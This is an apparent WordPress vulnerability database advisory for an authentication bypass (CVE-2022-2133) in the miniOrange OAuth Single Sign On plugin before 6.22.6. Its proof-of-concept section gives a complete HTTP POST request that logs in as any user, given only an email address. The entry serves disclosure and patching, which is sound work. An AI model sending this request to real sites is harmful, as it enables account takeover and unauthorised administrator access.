WordPress Plugin Vulnerabilities

OAuth Single Sign On < 6.22.6 - Authentication Bypass

Description

The plugin doesn't validate that OAuth access token requests are legitimate, which allows attackers to log onto the site with the only knowledge of a user's email address.

Proof of Concept

POST / HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 40
Connection: close

option=mooauth&email=admin@localhost.org

Affects Plugins

Plugin icon
miniorange-login-with-eve-online-google-facebook
Fixed in 6.22.6

References

CVE
CVE-2022-2133
URL
https://lana.codes/lanavdb/12bb3c02-45f1-4ce8-8a5a-8b44352cf7fc/

Classification

Type
AUTHBYPASS
OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-287
CVSS
9.1 (critical)

Miscellaneous

Original Researcher
Lana Codes
Submitter
Lana Codes
Submitter website
https://lana.codes/
Submitter twitter
LanaCodes
Verified
Yes
WPVDB ID
e76939ca-180f-4472-a26a-e0c36cfd32de

Timeline

Publicly Published
2022-06-27 (about 1 years ago)
Added
2022-06-27 (about 1 years ago)
Last Updated
2023-04-01 (about 1 years ago)

Other

Published
Title
Published
2014-08-01
Title
MaxButtons 1.19.0 - includes/maxbuttons-button-css.php Authentication Bypass
Published
2023-12-27
Title
Login as User or Customer (User Switching) <= 3.8 - Authentication Bypass
Published
2023-12-27
Title
Checkout Mestres WP < 7.1.9.8 - Authentication Bypass via Password Reset
Published
2013-03-24
Title
Backupbuddy - importbuddy.php step Parameter Manipulation Authentication Bypass
Published
2008-01-15
Title
Spambam <= 2.1 - Authorisation Bypass